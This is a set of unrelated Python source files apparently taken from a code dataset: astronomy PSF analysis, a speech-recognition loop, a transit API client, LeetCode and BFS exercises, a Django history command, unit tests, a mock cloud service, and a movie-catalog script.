is?\\n')\r\n print('\\nYour guess is ' + guess + '\\n')\r\n preds=makePred(x.reshape(1,-1))\r\n print('The computer estimates:')\r\n print(labels)\r\n print(preds[0])\r\n print(\"\\nThe computer's guess is {}\".format(labels[np.argmax(preds)]))\r\n print(\"The correct answer is \" + yVal[idx])","sub_path":"src/cnn pipe/4_minigame.py","file_name":"4_minigame.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"626429988","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 13 16:05:33 2018\n\nCode to look at psf data of individual quadrants\n\n@author: ppxee\n\"\"\"\n\n\n### Import required libraries ###\nimport matplotlib.pyplot as plt #for plotting\nfrom astropy.io import fits #for handling fits\n#from astropy.table import Table #for handling tables\nimport numpy as np #for handling arrays\n#import math\n#from astropy.stats import median_absolute_deviation\nimport vari_funcs #my module to help run code neatly\nfrom photutils import CircularAperture, aperture_photometry\nfrom astropy.coordinates import match_coordinates_sky\nfrom astropy.coordinates import SkyCoord\nfrom astropy import units as u\nplt.close('all') #close any open plots\n\ndef radial_profile(data, center):\n y, x = np.indices((data.shape)) #create coordinate grid\n r = np.sqrt((x - center[0])**2 + (y - center[1])**2) #get radius values for grid\n r = r.astype(np.int)\n\n tbin = np.bincount(r.ravel(), data.ravel()) # counts number of times value\n # of radius occurs in the psf\n # weighted by the data\n nr = np.bincount(r.ravel()) # counts number of radii values in psf\n radialprofile = tbin / nr # as weighted is r*data then get profile by \n # dividing by unweighted counts of r values.\n return radialprofile \n\ndef get_psf(sem):\n return fits.getdata('PSFs/'+sem+'_K_PSF.fits')\n\ndef quadrants(initdata,sem):\n \n ira = initdata['X_IMAGE_'+sem]\n idec = initdata['Y_IMAGE_'+sem]\n\n ### define bounds of quadrants ###\n midra = 12450\n middec = 13310\n \n ### create masks for quadrant ###\n mask1 = ira < midra\n mask2 = idec >= middec\n quad1data = initdata[mask1*mask2]\n \n mask1 = ira >= midra\n mask2 = idec >= middec\n quad2data = initdata[mask1*mask2]\n \n mask1 = ira < midra\n mask2 = idec < middec\n quad3data = initdata[mask1*mask2]\n \n mask1 = ira >= midra\n mask2 = idec < middec\n quad4data = initdata[mask1*mask2]\n \n \n return quad1data, quad2data, quad3data, quad4data\n\ndef get_avg_flux(tbdata):\n flux = vari_funcs.hflux4_stacks(tbdata)\n flux = vari_funcs.normalise_flux(flux)\n return np.nanmedian(flux, axis=0)\n\ndef psf_and_profile(quad, sem):\n centre = [29,29]\n psf = fits.getdata('PSFs/H/Quad_PSFs/cleaned_Kstars_'+sem+'_'+str(quad)+'_H_PSF.fits')\n# if sem == '10B':\n# psf = fits.getdata('PSFs/Quad_PSFs/'+sem+'_'+str(quad)+'_K_PSF.fits')\n# else:\n# psf = fits.getdata('PSFs/Quad_PSFs/extraq_'+sem+'_'+str(quad)+'_K_PSF.fits')\n\n rp = vari_funcs.radial_profile(psf, centre)\n return psf, rp, np.sqrt(rp)\n\nsemesters = ['06B', '07B', '08B', '09B', '10B', '11B', '12B']\nhdr08B = fits.getheader('Images/UDS-DR11-K.mef.fits') # random year (same in all)\nconst = -hdr08B['CD1_1'] # constant that defines unit conversion for FWHM\nr = np.arange(0,42,1) * const * 3600 #define radius values\ncentre = [29,29]\n\npsf_data = fits.open('UDS_catalogues/DR11_stars_for_PSFs.fits')[1].data\nsdata = fits.open('mag_flux_tables/H/stars_mag_flux_table_H_cleaned.fits')[1].data\n#set up time variable for plot\nt = np.linspace(2, 8, num=7)\n\nfor n, sem in enumerate(semesters):### Define coordinates ###\n \n refcoord = SkyCoord(psf_data['ALPHA_J2000_1']*u.degree, psf_data['DELTA_J2000_1']*u.degree)\n semcoord = SkyCoord(sdata['ALPHA_J2000_'+sem]*u.degree, sdata['DELTA_J2000_'+sem]*u.degree)\n \n ### Match catalogues and create new table ###\n idx, d2d , _ = match_coordinates_sky(refcoord, semcoord) #match these 'good' stars to create table\n\n if sem == '06B':\n ids = sdata['NUMBER_06B'][idx]\n else:\n ids = np.intersect1d(ids, sdata['NUMBER_06B'][idx])\n\nmask = np.isin(sdata['NUMBER_06B'], ids)\ntempsdata = sdata[mask] \nprint(len(tempsdata['MAG_APER_'+sem][:,4]))\nsquad1data, squad2data, squad3data, squad4data = quadrants(tempsdata,'06B')\n\n### get average FWHM ###\navgFWHM1 = np.zeros(len(semesters))\navgFWHM2 = np.zeros(len(semesters))\navgFWHM3 = np.zeros(len(semesters))\navgFWHM4 = np.zeros(len(semesters))\nfor n, sem in enumerate(semesters):\n avgFWHM1[n] = np.nanmedian(squad1data['FWHM_WORLD_'+sem]) * 3600\n avgFWHM2[n] = np.nanmedian(squad2data['FWHM_WORLD_'+sem]) * 3600\n avgFWHM3[n] = np.nanmedian(squad3data['FWHM_WORLD_'+sem]) * 3600\n avgFWHM4[n] = np.nanmedian(squad4data['FWHM_WORLD_'+sem]) * 3600\n\n### get average flux ### \navgflux1 = get_avg_flux(squad1data)\navgflux2 = get_avg_flux(squad2data)\navgflux3 = get_avg_flux(squad3data)\navgflux4 = get_avg_flux(squad4data)\n\n## get psfs, aper flux, and profiles ###\npixelr = (1.5/3600) / const\naperture = CircularAperture(centre, pixelr)\nsmallaperture = CircularAperture(centre, pixelr)\npsf = {}\nrp = {}\nsqrtrp = {}\naperflux = {1:np.empty(len(semesters)),\n 2:np.empty(len(semesters)),\n 3:np.empty(len(semesters)),\n 4:np.empty(len(semesters))}\nfor m, sem in enumerate(semesters):\n psf[sem] = {}\n rp[sem] = {}\n sqrtrp[sem] ={}\n for n in [1,2,3,4]:\n psf[sem][n], rp[sem][n], sqrtrp[sem][n] = psf_and_profile(n,sem)\n ### Determine flux within 3 arcsec apertures ###\n phot = aperture_photometry(psf[sem][n], aperture)\n aperflux[n][m] = phot['aperture_sum'][0]\n ### Plot the psfs ###\n plt.figure(m+5)\n plt.subplot(2,2,n)\n plt.imshow(np.log(psf[sem][n]), vmax=-4.0, vmin=-20)\n vari_funcs.no_ticks()\n plt.title(sem+str(n))\n# print(np.nanmin(np.log(psf[sem][n])))\n \n### Plot FWHM curves ###\nplt.figure(1, figsize=[9,6])\nplt.subplot(221)\nplt.plot(t,avgFWHM1,'o')\nplt.ylim(ymax=0.95, ymin=0.780)\nplt.xticks(t, semesters)\nplt.ylabel('FWHM')\nplt.xlabel('Semester')\n\nplt.subplot(222)\nplt.plot(t,avgFWHM2,'o')\nplt.ylim(ymax=0.95, ymin=0.780)\nplt.xticks(t, semesters)\nplt.ylabel('FWHM')\nplt.xlabel('Semester')\n\nplt.subplot(223)\nplt.plot(t,avgFWHM3,'o')\nplt.ylim(ymax=0.95, ymin=0.780)\nplt.xticks(t, semesters)\nplt.ylabel('FWHM')\nplt.xlabel('Semester')\n\nplt.subplot(224)\nplt.plot(t,avgFWHM4,'o')\nplt.ylim(ymax=0.95, ymin=0.780)\nplt.xticks(t, semesters)\nplt.ylabel('FWHM')\nplt.xlabel('Semester')\nplt.tight_layout()\n\n### Plot median flux curves ###\nplt.figure(2, figsize=[9,6])\nplt.subplot(221)\nplt.plot(t,avgflux1,'o')\nplt.ylabel('Median Flux of stars')\nplt.ylim(ymax=1.03, ymin=0.97)\nplt.xticks(t, semesters)\nplt.xlabel('Semester')\n\nplt.subplot(222)\nplt.plot(t,avgflux2,'o')\nplt.ylabel('Median Flux of stars')\nplt.ylim(ymax=1.03, ymin=0.97)\nplt.xticks(t, semesters)\nplt.xlabel('Semester')\n\nplt.subplot(223)\nplt.plot(t,avgflux3,'o')\nplt.ylabel('Median Flux of stars')\nplt.ylim(ymax=1.03, ymin=0.97)\nplt.xticks(t, semesters)\nplt.xlabel('Semester')\n\nplt.subplot(224)\nplt.plot(t,avgflux4,'o')\nplt.ylabel('Median Flux of stars')\nplt.ylim(ymax=1.03, ymin=0.97)\nplt.xticks(t, semesters)\nplt.xlabel('Semester')\nplt.tight_layout()\n\n### Plot radial profiles ###\nplt.figure(3, figsize=[12,9])\nfor sem in sqrtrp:\n for n in sqrtrp[sem]:\n plt.subplot(2,2,n)\n plt.plot(r, sqrtrp[sem][n], label=sem)\n plt.xlabel('Radius (arcsec)')\n plt.ylabel('sqrt(Flux)')\n plt.ylim(ymax=0.16, ymin=0)\n plt.legend()\nplt.tight_layout()\n\n### Plot aper flux curves ###\nplt.figure(4, figsize=[9,6])\nfor n in [1,2,3,4]:\n plt.subplot(2,2,n)\n plt.plot(t,aperflux[n],'o')\n plt.ylabel('Aperture Flux of PSF')\n plt.ylim(ymax=0.96, ymin=0.925)\n plt.xticks(t, semesters)\n plt.xlabel('Semester')\n plt.tight_layout()\n","sub_path":"quadtests_H.py","file_name":"quadtests_H.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"66195359","text":"import os\nfrom pocketsphinx import LiveSpeech, get_model_path\nfile = open(\"ready.st\",\"w\")\t\nfile.write(\"false\")\nfile.close()\n\n\nmodel_path = get_model_path()\nspeech = LiveSpeech(\n verbose=False,\n sampling_rate=16000,\n buffer_size=2048,\n no_search=False,\n full_utt=False,\n hmm=os.path.join(model_path, 'zero_ru.cd_cont_4000'),\n lm=os.path.join(model_path, 'ru.lm'),\n dic=os.path.join(model_path, 'ru.dic'))\nfile = open(\"ready.st\",\"w\")\t\nfile.write(\"true\")\nfile.close()\nprint(\"Yes\")\nfor phrase in speech:\n\tprint(phrase)\n\twFile = open(\"vol.txt\",\"w\")\n\twFile.write(str(phrase))\n\twFile.close()\n\n\n\n\n\n\n","sub_path":"TestProject/bin/Debug/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"67212381","text":"import sys; sys.stdin = open('input_data/2206.txt')\nfrom collections import deque\nfrom pprint import pprint\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n\nheight, width = map(int, sys.stdin.readline().split())\nGround = [list(map(int, ' '.join(sys.stdin.readline()).split())) for _ in range(height)]\nvisit = [[10000]*width for _ in range(height)]\nQ = deque()\nQ.append([0, 0, False, 1])\nvisit[0][0] = 1\nwhile Q:\n x, y, attack, depth = Q.popleft()\n if depth > visit[height-1][width-1]:\n break\n if [x, y] == [height-1, width-1]:\n result = depth\n visit[x][y] = depth\n depth += 1\n for i in range(4):\n tx = x + dx[i]\n ty = y + dy[i]\n if 0 <= tx < height and 0 <= ty < width:\n visit[tx][ty] = depth\n if not Ground[tx][ty]:\n Q.append([tx, ty, attack, depth])\n elif not attack:\n Q.append([tx, ty, not attack, depth])\npprint(visit)\nif visit[height-1][width-1] == 10000:\n print(-1)\nelse:\n print(visit[height-1][width-1])","sub_path":"김재유/8.완전탐색(DFS &BFS) 2번째/boj_2206_벽부수고이동하기_2트.py","file_name":"boj_2206_벽부수고이동하기_2트.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"191288478","text":"#!/usr/bin/env python3\nimport json\nimport hmac\nimport base64\nfrom requests import Request, Session\nfrom requests.auth import AuthBase\nimport requests\nimport hashlib\n\n# debug?\ndebug = 1\n# credentials\napiuser = \"\"\napikey = \"\"\nmystation = \"\"\n\n# variables\nbaseurl = \"http://api-prod.geofox.de\"\nmethods = {\"Init\":\"/gti/public/init\",\\\n \"checkName\":\"/gti/public/checkName\",\\\n \"getRoute\":\"/gti/public/getRoute\",\\\n \"departureList\":\"/gti/public/departureList\",\\\n \"getAnnouncements\":\"/gti/public/getAnnouncements\",\\\n \"getStationInformation\":\"/gti/public/getStationInformation\"}\ns = Session()\n\nclass HVVAuth(AuthBase):\n def __init__(self, payload):\n self.sig = base64.b64encode(hmac.new(apikey.encode(\"UTF-8\"), json.dumps(payload).encode(\"UTF-8\"), hashlib.sha1).digest())\n print(self.sig)\n def __call__(self, request):\n request.headers['geofox-auth-signature'] = self.sig\n request.headers['geofox-auth-user'] = apiuser\n return request\n\ndef make_request(method, payload):\n if debug == 1:\n print(\"> build_request got inputs: {}, {}\".format(method, payload))\n url = baseurl + methods[method]\n headers = {\"Content-Type\":\"application/json\",\"Accept\":\"application/json\"}\n request = Request('POST',\n url,\n headers=headers,\n auth=HVVAuth(payload),\n json=payload).prepare()\n if debug == 1:\n print(\"> the following request was constructed:\")\n pretty_print_POST(request)\n response = s.send(request)\n if debug == 1:\n print(\"> it returned with status code {}:\".format(response.status_code))\n try:\n print(\">> {}\".format(response.text))\n print(\">> {}\\n\".format(json.dumps(response.json)))\n except:\n pass\n\n return response.text\n\ndef pretty_print_POST(req):\n \"\"\"\n At this point it is completely built and ready\n to be fired; it is \"prepared\".\n\n However pay attention at the formatting used in \n this function because it is programmed to be pretty \n printed and may differ from the actual request.\n \"\"\"\n print('{}\\n{}\\r\\n{}\\r\\n\\r\\n{}'.format(\n '-----------START-----------',\n req.method + ' ' + req.url,\n '\\r\\n'.join('{}: {}'.format(k, v) for k, v in req.headers.items()),\n req.body,\n ))\n\nprint(\">>> Started script..\")\nprint(\">>> Running \\\"getAnnouncemts\\\"...\")\nprint(json.dumps(make_request(\"getAnnouncements\",{}), indent=4))\nprint(\">>> Getting name of Station {}...\".format(mystation))\nstation = json.loads(make_request(\"checkName\",{\"theName\":{\"name\":mystation,\"type\":\"STATION\"}}))\nprint(\">>> Getting departures for Station {}...\".format(mystation))\nprint(json.dumps(make_request(\"departureList\",{\"station\":station[\"results\"][0],\"time\":{\"date\":\"10.12.2019\",\"time\":\"12:00\"},\"maxList\":\"20\",\"maxTimeOffset\":60,\"useRealtime\":\"true\"}), indent=4))\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"638053664","text":"class Solution:\r\n def findMedianSortedArrays(self, nums1, nums2):\r\n \"\"\"\r\n 找两个有序数组的中位数\r\n :param nums1:有序数组1\r\n :param nums2:有序数组2\r\n :return:中位数\r\n \"\"\"\r\n # 组合两个列表\r\n # nums = sorted(nums1 + nums2)\r\n nums = []\r\n\r\n # 组合两个列表 成为一个有序的列表\r\n while True:\r\n if len(nums1) > 0 and len(nums2) > 0:\r\n if nums1[0] < nums2[0]:\r\n nums.append(nums1.pop(0))\r\n else:\r\n nums.append(nums2.pop(0))\r\n elif len(nums1) > 0:\r\n nums.append(nums1.pop(0))\r\n elif len(nums2) > 0:\r\n nums.append(nums2.pop(0))\r\n else:\r\n break\r\n\r\n # 奇数\r\n if len(nums) % 2 != 0:\r\n return nums[(len(nums) - 1) // 2]\r\n # 偶数\r\n else:\r\n return (nums[len(nums) // 2] + nums[len(nums) // 2 - 1]) / 2\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(Solution().findMedianSortedArrays([1, 3], [2]))\r\n","sub_path":"LeetCode_Python/Test_4_findMedianSortedArrays.py","file_name":"Test_4_findMedianSortedArrays.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"397767859","text":"from django.core.management.base import NoArgsCommand\nfrom django.apps import apps\nfrom django.db.transaction import atomic\n\nfrom ... import MIN, create_history_record, insert_history_records\n\n\nclass Command(NoArgsCommand):\n def handle_noargs(self, **options):\n chunk_size = options.get('chunk_size', 1000)\n verbosity = options.get('verbosity', 0)\n models = apps.get_models(include_auto_created=True,\n include_deferred=True,\n include_swapped=True)\n models = [m for m in models if hasattr(m, '_tt_has_history')]\n models = [m for m in models if not m._meta.proxy]\n for i, m in enumerate(models):\n if verbosity:\n msg = u'%s/%s: %s' % (i + 1, len(models), m._meta.model_name)\n self.stdout.write(msg, self.style.MIGRATE_LABEL)\n\n numobjs = m.objects.all().count()\n with atomic():\n m._tt_model.objects.all().delete()\n\n collected = []\n for j, obj in enumerate(m.objects.all()):\n collected.append(create_history_record(m, obj, MIN))\n if len(collected) == chunk_size:\n if verbosity:\n msg = u' %s/%s' % (j + 1, numobjs)\n self.stdout.write(msg, ending=' ')\n self.stdout.write('OK', self.style.MIGRATE_SUCCESS)\n insert_history_records(m, collected)\n collected = []\n\n if collected:\n if verbosity:\n msg = u' %s/%s' % (j + 1, numobjs)\n self.stdout.write(msg, ending=' ')\n self.stdout.write('OK', self.style.MIGRATE_SUCCESS)\n insert_history_records(m, collected)\n","sub_path":"django_timetravel/management/commands/init_timetravel.py","file_name":"init_timetravel.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"396810746","text":"# def list():\n# \tlist1=[5,10,15,20,25]\n# \tlist=list1[0],list1[-1]\n# \treturn (list)\n# print (list())\n\n\n# a=[1,1,2,3,5,8,13,21,34,55,89]\n# b=[]\n# def list2():\n# \tfor index in a:\n# \t\tif index <=5:\n# \t\t\tprint (index)\n# \t\t\ta.append()\n\n\ndef FirstAndLast(NumList):\n\tnewlist = []\n\tnewlist.append(NumList[0])\n\tnewlist.append(NumList[-1])\n\tprint(newlist)\n\nFirstAndLast([1,2,3,4,5])\n\n\ndef IfLessThanFive(list1):\n\tfor elms in list1:\n\t\tif elms < 5:\n\t\t\tprint(elms)\n\nIfLessThanFive([0,2,78,123,1,9,4,3,-8])\n\ndef elements(list1 , list2):\n\tnewList = []\n\tfor numbers in list1:\n\t\tif numbers in list2:\n\t\t\tnewList.append(numbers)\n\tprint(newList)\n\nelements([1,3,4,67,45,25,12],[1,34,4,54,45,12])\n\n","sub_path":"yl1201718/lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"517391522","text":"from entities.Entities import Book, Client, Rental\nfrom repo.Repository import RepoBook, RepoClient, RepoRental\nfrom business.Service import ServiceBook, ServiceClient, ServiceRental\nfrom valid.Validation import BookValidator, ClientValidator, RepoValidator\nfrom undo.UndoRedo import UndoRedo, UndoOperation\nimport unittest\n\nclass Tests(unittest.TestCase):\n \n def setUp(self):\n self.__bookId = 5\n self.__title = \"Fratii Karamazov\"\n self.__author = \"Dostoievski\"\n self.__description = \"pam pam\"\n self.__clientId = 7\n self.__name = \"Ion Iliescu\"\n self.__rentalId = 16\n self.__rentedDate = 20\n self.__dueDate = 13\n self.__returnedDate = 30\n self.__book = Book(self.__bookId, self.__title, self.__description, self.__author)\n self.__client = Client(self.__clientId, self.__name)\n self.__rental = Rental(self.__rentalId, self.__bookId, self.__clientId, self.__rentedDate, self.__dueDate, self.__returnedDate)\n self.__repoBook = RepoBook()\n self.__repoClient = RepoClient()\n self.__undoList = UndoRedo()\n self.__repoRental = RepoRental(self.__repoBook, self.__repoClient)\n self.__validBook = BookValidator()\n self.__validClient = ClientValidator()\n self.__validRental = RepoValidator(self.__repoBook, self.__repoClient)\n self.__bookService = ServiceBook(self.__repoBook, self.__validBook, self.__undoList)\n self.__clientService = ServiceClient(self.__repoClient, self.__validClient, self.__undoList)\n self.__rentalService = ServiceRental(self.__repoBook, self.__repoClient, self.__validRental, self.__repoRental, self.__undoList)\n \n def testModels(self):\n self.assertEquals(self.__book.get_book_id(), self.__bookId)\n self.assertEquals(self.__client.get_name(), self.__name)\n self.assertEquals(self.__rental.get_rental_id(), self.__rentalId)\n #self.assertEquals self.__rental.get_number_of_rentals() == self.__numberOfRentals\n \n def testRepository(self):\n self.assertEquals(len(self.__repoBook),0)\n self.__repoBook.addElement(self.__book, 0)\n self.assertEquals(len(self.__repoBook), 1)\n new_book = Book(3, \"Ion\", \"glasul pamantului/glasul iubirii\", \"Liviu Rebreanu\")\n self.__repoBook.addElement(new_book, 0)\n self.assertEquals(len(self.__repoBook), 2)\n try:\n self.__repoBook.addElement(self.__book, 0)\n self.assertEquals(False)\n except ValueError as re:\n self.assertEquals(str(re), \"existing element\")\n \n self.assertEquals(len(self.__repoClient), 0)\n self.__repoClient.addElement(self.__client, 0)\n self.assertEquals(len(self.__repoClient), 1)\n new_client = Client(2, \"Justin Trudeau\")\n self.__repoClient.addElement(new_client, 0)\n self.assertEquals(len(self.__repoClient), 2)\n try:\n self.__repoClient.addElement(self.__client, 0)\n self.assertEquals(False)\n except ValueError as re:\n self.assertEquals(str(re), \"existing element\")\n self.__repoClient.removeElement(new_client.get_client_id())\n self.assertEquals (len(self.__repoClient) , 1)\n try:\n self.__repoClient.removeElement(new_client.get_client_id())\n self.assertEquals(False)\n except ValueError as re:\n self.assertEquals(str(re), \"inexisting element\")\n \n #self.__repo.printBooks()\n new_book = Book(3, \"HP\", \"JK Rowling\", \"magic\")\n self.__repoBook.updateElement(new_book, 0)\n cnt = self.__repoBook.searchElement1(new_book)\n cnt = int(cnt)\n \n \n def testBusiness(self):\n self.__repoBook = RepoBook()\n self.__business = ServiceBook(self.__repoBook, self.__validBook, self.__undoList)\n self.assertEquals(len(self.__business),0)\n \n self.__business.addNewBook(self.__bookId, self.__title, self.__author, self.__description)\n self.assertEquals(len(self.__business), 1)\n self.__business.addNewBook(15, \"GoT\", \"George RR Martin\", \"abcd\")\n self.assertEquals(len(self.__business), 2)\n \n self.__repoClient = RepoClient()\n self.__business = ServiceClient(self.__repoClient, self.__validClient, self.__undoList)\n self.__business.addNewClient(self.__clientId, self.__name)\n self.assertEquals(len(self.__business), 1)\n self.__business.addNewClient(5, \"Nicolae Ceausescu\")\n self.assertEquals(len(self.__business), 2)\n element = Client(5, \"Traian Basescu\")\n self.__repoClient.updateElement(element, 0)\n search = self.__repoClient.searchElement(5, 2)\n self.assertEquals(search.get_name(), \"Traian Basescu\")\n self.__business.removeClient(5, \"Nicolae Ceausescu\")\n self.assertEquals(len(self.__business), 1)\n \n self.__repoBook = RepoBook()\n self.__business = ServiceBook(self.__repoBook, self.__validBook, self.__undoList)\n self.__business.addNewBook(23, \"De veghe in lanul de secara\", \"JD Salinger\", \"Roman\")\n self.__business.addNewBook(15, \"Martianul\", \"Andy Weir\", \"I-a placut lui Leo\")\n self.__business.removeBook(15, 0)\n self.assertEquals(len(self.__business), 1)\n element = Book(15, \"1984\", \"George Orwell\", \"Tot lui Leo i-a placut\")\n self.__repoBook.addElement(element, 0)\n element = Book(15, \"1984\", \"Pam pam\", \"Tot lui Leo i-a placut\")\n self.__repoBook.updateElement(element, 0)\n search = self.__repoBook.searchElement(15, 1)\n self.assertEquals(search.get_author(), \"Pam pam\")\n \n \n \n \n def testRent(self):\n pass\n# def runTests(self):\n# self.testModels()\n# self.testRepository()\n# self.testBusiness()\n","sub_path":"FP and Logics/library/tests/Tests.py","file_name":"Tests.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"289577178","text":"import os\nimport logging\nimport json\nimport random\nfrom pprint import pformat\n\nfrom src.main.python.tranquilitybase.gcpdac_mock.config import counter\n\nlogger = logging.getLogger(\"application\")\n\napplication_response_json = \"\"\napplication_response_file = \"core/sample_responses/application/application_response_example.json\"\nwith open(application_response_file, \"r\") as fh:\n application_response_json = json.load(fh)\n\ndef next_taskid():\n task_cnt = next(counter)\n taskid = f\"MOCKTASKID{task_cnt}\"\n return taskid\n\ndef get_random_status():\n r = random.randint(0, 10)\n if r == 0:\n status = \"FAILURE\"\n elif r in (1, 2, 3, 4):\n status = \"STARTED\"\n elif r > 4:\n status = \"SUCCESS\"\n return status\n\n\ndef get_status():\n if os.environ.get(\"MOCK_MODE\"):\n return get_random_status()\n else:\n return \"SUCCESS\"\n\n\ndef create_async(applicationDetails):\n \"\"\"\n Return just the task_id.\n \"\"\"\n\n logger.debug(pformat(applicationDetails))\n taskid = next_taskid()\n logger.info(\"Task ID %s\", taskid)\n context = {\n \"taskid\": f\"{taskid}\"\n }\n return context, 201\n\n\ndef delete_async(oid):\n \"\"\"\n Return just the task_id.\n \"\"\"\n logger.debug(\"Id is {}\".format(oid))\n taskid = next_taskid()\n logger.info(\"Task ID %s\", taskid)\n context = {\n \"taskid\": f\"{taskid}\"\n }\n return context, 200\n\n\ndef create_application_result(taskid):\n logger.info(\"CREATE application RESULT %s\",format(taskid))\n\n retval = {\n \"status\": get_status()\n }\n if retval.get('status') == \"SUCCESS\" or retval.get('status') == \"FAILURE\":\n retval[\"payload\"] = json.dumps(application_response_json['payload'])\n return retval, 201\n\n\ndef delete_application_result(taskid):\n logger.info(\"DELETE application RESULT %s\",format(taskid))\n\n retval = {\n \"status\": get_status()\n }\n if retval.get('status') == \"SUCCESS\" or retval.get('status') == \"FAILURE\":\n retval[\"payload\"] = json.dumps(application_response_json['payload'])\n return retval, 200\n","sub_path":"src/main/python/tranquilitybase/gcpdac/mock/core/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"552851067","text":"class Solution(object):\n def removeDuplicates(self, nums):\n #count=0\n #while(count.\n \"\"\"\n\n\"\"\"\n Este módulo es una aplicación básica con un menú de opciones para cargar datos, contar elementos, y hacer búsquedas sobre una lista .\n\"\"\"\n#imports\n\nimport config as cf\nimport sys\nimport csv\nimport Support as sup\n\nfrom ADT import list as lt\nfrom DataStructures import listiterator as it\nfrom DataStructures import liststructure as lt\nfrom time import process_time \n\n#Funciones\n\ndef compareRecordIds(recordA, recordB):\n if int(recordA['id']) == int(recordB['id']):\n return 0\n elif int(recordA['id']) > int(recordB['id']):\n return 1\n return -1\n\n\ndef loadCSVFile (file, lst):\n lst=lt.newList(datastructure=\"ARRAY_LIST\")\n dialect = csv.excel()\n dialect.delimiter=\";\"\n try:\n with open( file, encoding=\"utf-8\") as csvfile:\n row = csv.DictReader(csvfile, dialect=dialect)\n for elemento in row: \n lt.addLast(lst,elemento)\n except:\n print(\"Hubo un error con la carga del archivo\")\n return lst\n\n\ndef loadMovies (file, lst):\n lst = loadCSVFile(file, lst) \n print(\"Datos cargados, \" + str(lt.size(lst)) + \" elementos cargados\")\n return lst\n\ndef FindGoodMovie(lst,lst2,name_director):\n \"Retorna: el numero de películas buenas de un director y su promedio de la votación.\"\n list_movies=[]\n info_movies= sup.findmoviesDirector(name_director, lst)\n avgsum=0\n for movie in info_movies:\n movie_data=sup.findmovieId(movie['id'], lst2)\n if movie_data[\"vote_average\"] >= 6:\n list_movies.append(movie_data['title'])\n avgsum+=float(movie_data['vote_average'])\n size=len(list_movies)\n avg=avgsum/size\n return(size,avg)\n\n\n\ndef rankingMovies(lst, criteria, opcion):\n \"\"\"\n Genera rankings de acuerdo a las condiciones puestas.\n\n Arg:\n lst :: list\n -La informacion de detallada de las peliculas.\n criteria :: str\n -Criterio de ordenamiento\n opcion :: int\n -Determina si se ordena de menor a mayor o de mayor a menor\n 1,2 respectivamente\n \n Retorna :: list\n -TAD list con el catalogo pedido.\n \"\"\"\n catalog=lt.newList(datastructure='ARRAY_LIST')\n sup.sort(lst, criteria, opcion)\n if opcion == '1':\n i=0\n while i < 5:\n movie=lt.getElement(lst, i)\n lt.addLast(catalog, movie['title'])\n i+=1\n elif opcion == '2':\n i=0\n while i < 10:\n movie=lt.getElement(lst, i)\n lt.addLast(catalog, movie['title'])\n i+=1\n return catalog\n\n\n\ndef SearchbyDirector(lst,lst2,name_director):\n \"\"\"\n Busca todas las peliculas en las que un director trabajo.\n Arg:\n -lst :: list \n La informacion en bruto de las peliculas.\n -lst2 :: list \n La informacion especifica de las peliculas.\n -name_director :: str\n El nombre del director.\n \n Retorna :: tuple \n -Todas las películas dirigidas, El numero de las películas \n y El promedio de la calificación de sus películas.\n \"\"\"\n avgsum= 0\n info_movies=sup.findmoviesDirector(name_director, lst)\n size=len(info_movies)\n list_movies=[]\n for movie in info_movies:\n movie_data=sup.findmovieId(movie['id'], lst2)\n list_movies.append(movie_data['title'])\n avgsum+=float(movie_data['vote_average'])\n avg=avgsum/size\n return(list_movies,size,avg)\n\ndef SearchbyActor(lst,lst2,actor_name):\n \"\"\"\n Busca todas las peliculas en las que un actor participo.\n Arg:\n -lst :: list \n -La informacion en bruto de las pelicula.\n -lst2 :: list\n -La informacion especifica de las peliculas.\n -actor_name :: str \n -Nombre del actor buscado\n retorna :: tuple \n -Todas las películas en las que actuo, el numero de las películas, \n el promedio de calificacion y el director con el que mas trabajo en ese orden.\n \"\"\"\n avgsum= 0\n info_movies=sup.findmoviesActor(actor_name, lst)\n size=len(info_movies)\n list_movies=[]\n dict_directors={}\n for movie in info_movies:\n print(movie)\n print(size)\n name_director=movie['director_name']\n movie_data=sup.findmovieId(movie['id'], lst2)\n list_movies.append(movie_data['title'])\n avgsum+=float(movie_data['vote_average'])\n if name_director in dict_directors.keys():\n dict_directors[name_director]+=1\n else:\n dict_directors[name_director]=1\n director= max(dict_directors)\n avg=round(avgsum/size,2) \n return(list_movies,size,avg,director)\n\ndef meetGenre(lst, lst2, genre):\n \"\"\"\n Busca todas las peliculas que corresponden al genero dado por parametro.\n Arg:\n lst :: list\n -La informacion en bruto de las peliculas.\n lst2 :: list\n -La informacion especifica de las peliculas.\n genre :: str\n -El genero que se desea buscar.\n Retorna :: tuple\n -El titulo de las peliculas, el numero de peliculas y la votacion promedio en ese orden.\n \"\"\"\n avgsum=0\n info_movies=sup.findmoviesGenre(genre, lst2)\n list_movies=[]\n size=len(info_movies)\n i=0\n while i < size:\n list_movies.append(info_movies[i]['title'])\n avgsum+=float(info_movies[i]['vote_count'])\n i+=1\n avgsum=round(avgsum/size,2)\n return(list_movies, size, avgsum)\n\ndef 